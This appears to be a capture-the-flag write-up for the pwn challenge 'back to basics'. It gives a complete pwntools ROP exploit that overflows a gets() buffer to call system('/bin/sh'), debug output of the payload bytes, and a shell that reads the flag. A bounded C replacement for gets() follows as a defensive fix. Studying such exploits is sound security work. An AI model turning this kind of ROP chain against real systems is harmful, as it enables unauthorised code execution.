### === back to basics (Pwn: 43 solves, 965 pts) ===
by mito
1. This binary has a stack overflow vulnerability.
2. The binary uses the gets() and system() functions.
3. I can read a string ("/bin/sh") into the BSS area with the gets() function.
4. So I can call system("/bin/sh").
5. Pwntools is installed on this server.
6. I copied the exploit code to /tmp and ran it.
```python
from pwn import *
#context(os='linux', arch='amd64')
context.log_level = 'debug'
BINARY = './basic'
#BINARY = '/home/basic/basic'
elf = ELF(BINARY)
gets_plt = elf.plt['gets']      # PLT stubs of the two imported functions
system_plt = elf.plt['system']
pop_rdi_ret = 0x400743          # pop rdi; ret; (rdi = first argument on amd64)
bss_addr = 0x601080             # writable BSS address used as the string buffer
s = process(BINARY)
libc = elf.libc                 # not needed for this chain, kept from the original
# bytes literals so the same script works with Python 3 pwntools
buf = b"A"*152                  # padding up to the saved return address
# gets(bss_addr): the second gets() call reads "/bin/sh" into BSS
buf += p64(pop_rdi_ret)
buf += p64(bss_addr)
buf += p64(gets_plt)
# system(bss_addr)
buf += p64(pop_rdi_ret)
buf += p64(bss_addr)
buf += p64(system_plt)
#pause()
s.sendline(buf)
sleep(0.1)
s.sendline(b"/bin/sh\x00")      # consumed by the gets() call in the chain
s.interactive()
```
```
$ python solve.py r
[DEBUG] Sent 0xc9 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000090 41 41 41 41 41 41 41 41 43 07 40 00 00 00 00 00 │AAAA│AAAA│C·@·│····│
000000a0 80 10 60 00 00 00 00 00 20 05 40 00 00 00 00 00 │··`·│····│ ·@·│····│
000000b0 43 07 40 00 00 00 00 00 80 10 60 00 00 00 00 00 │C·@·│····│··`·│····│
000000c0 f0 04 40 00 00 00 00 00 0a │··@·│····│·│
000000c9
[DEBUG] Sent 0x9 bytes:
00000000 2f 62 69 6e 2f 73 68 00 0a │/bin│/sh·│·│
00000009
[*] Switching to interactive mode
$ cat flag.txt
securinets{ed_for_the_win}
```
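The root cause in steps 1 and 2 is that gets() has no length argument, so a long line simply runs past the buffer and over the saved return address. The following is an added example of mine, not code from the challenge binary or the writeup: a bounded replacement for gets() that never writes past the buffer, reports when a line was cut off, and discards the remainder of an over-long line so it is not mistaken for the next input. The 136-byte buffer size is an assumption for the demo (the page only states that 152 bytes reach the return address), and the 200-byte input line is constructed here.

```c
#include <stdio.h>
#include <string.h>

/* Status codes returned by bounded_line(). */
enum { LINE_OK = 0, LINE_TRUNCATED = 1, LINE_EOF = -1 };

/*
 * Bounded replacement for gets(). Never writes beyond dst[cap-1], always
 * leaves dst NUL-terminated, strips the trailing newline, and reports when
 * the input line did not fit (the remainder is consumed and dropped).
 */
int bounded_line(char *dst, size_t cap, FILE *in)
{
    if (cap == 0)
        return LINE_EOF;
    if (fgets(dst, (int)cap, in) == NULL) {      /* EOF or read error */
        dst[0] = '\0';
        return LINE_EOF;
    }
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {       /* whole line fit */
        dst[len - 1] = '\0';
        return LINE_OK;
    }
    /* No newline seen: the line filled the buffer or ended at EOF. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return LINE_OK;                           /* fit exactly, nothing lost */
    /* Over-long line: drain it so the next read starts on a fresh line. */
    while (c != EOF && c != '\n')
        c = fgetc(in);
    return LINE_TRUNCATED;
}

/* Constructed input stream for the demo (tmpfile() is standard C). */
static FILE *constructed_input(const char *s)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return NULL;
    fwrite(s, 1, strlen(s), f);
    rewind(f);
    return f;
}

#define DEMO_CAP 136               /* assumed buffer size, not from the page */

static char g_last[DEMO_CAP];      /* result of the last demo_status() read */

/*
 * Feeds a constructed 200-byte line (longer than the 152-byte overflow in the
 * writeup) followed by a short line through bounded_line() and returns the
 * status of read number `which` (0-based); g_last holds that read's text.
 */
int demo_status(int which)
{
    char payload[256];
    memset(payload, 'A', 200);
    payload[200] = '\n';
    memcpy(payload + 201, "second line\n", 13);  /* 13 includes the NUL */
    FILE *in = constructed_input(payload);
    if (in == NULL)
        return -99;
    int st = -99;
    for (int i = 0; i <= which; i++)
        st = bounded_line(g_last, sizeof g_last, in);
    fclose(in);
    return st;
}

size_t demo_last_len(void) { return strlen(g_last); }
int demo_last_is(const char *s) { return strcmp(g_last, s) == 0; }

/* Edge case: a line of exactly DEMO_CAP-1 bytes fits and is not "truncated". */
int demo_exact_fit(void)
{
    char payload[DEMO_CAP + 1];
    memset(payload, 'B', DEMO_CAP - 1);
    payload[DEMO_CAP - 1] = '\n';
    payload[DEMO_CAP] = '\0';
    FILE *in = constructed_input(payload);
    if (in == NULL)
        return -99;
    char buf[DEMO_CAP];
    int st = bounded_line(buf, sizeof buf, in);
    fclose(in);
    return st;
}

int main(void)
{
    printf("over-long line: status %d, stored %zu bytes\n",
           demo_status(0), demo_last_len());
    printf("next line: status %d, text \"%s\"\n", demo_status(1), g_last);
    printf("exact fit: status %d\n", demo_exact_fit());
    return 0;
}
```

With this in place the 200-byte line is cut at 135 bytes and reported as truncated, the following line is still read cleanly, and the saved return address is never reachable from input. Compiling with stack protector and PIE enabled adds further layers, but no mitigation substitutes for the length check itself.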